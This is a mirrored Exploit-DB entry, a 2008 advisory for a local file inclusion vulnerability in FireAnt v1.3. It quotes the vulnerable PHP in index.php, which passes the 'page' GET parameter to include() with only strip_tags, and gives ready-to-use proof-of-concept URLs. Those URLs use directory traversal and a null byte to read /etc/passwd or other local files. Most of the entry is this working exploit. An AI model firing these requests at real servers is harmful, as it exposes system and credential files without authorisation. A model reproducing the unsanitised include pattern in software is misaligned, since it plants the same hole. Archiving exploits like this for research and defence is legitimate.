bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/5871.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

28 lines
No EOL
835 B
Text
Raw Blame History

###################################################################################
#
# Name : FireAnt v1.3 Local File Inclusion Vulnerability
# Author : cOndemned
# Dork : use Your brain (:
# Greetz : ZaBeaTy, str0ke, GregStar, irk4z, Sandtalker & Avantura ;**
#
###################################################################################
Source :
// index.php
8. $page = "bug_list"; //default page
9. if (!empty($_GET['page'])) {
10. $page = strip_tags($_GET['page']);
99. if (file_exists("./".$page.".php")) {
104. include("./".$page.".php");
Proof of Concept :
http://[host]/[FireAnt1.3]/index.php?page=../../../../etc/passwd%00
http://[host]/[FireAnt1.3]/index.php?page=../../../../[local_file]%00
# milw0rm.com [2008-06-20]
Reference in a new issue View git blame Copy permalink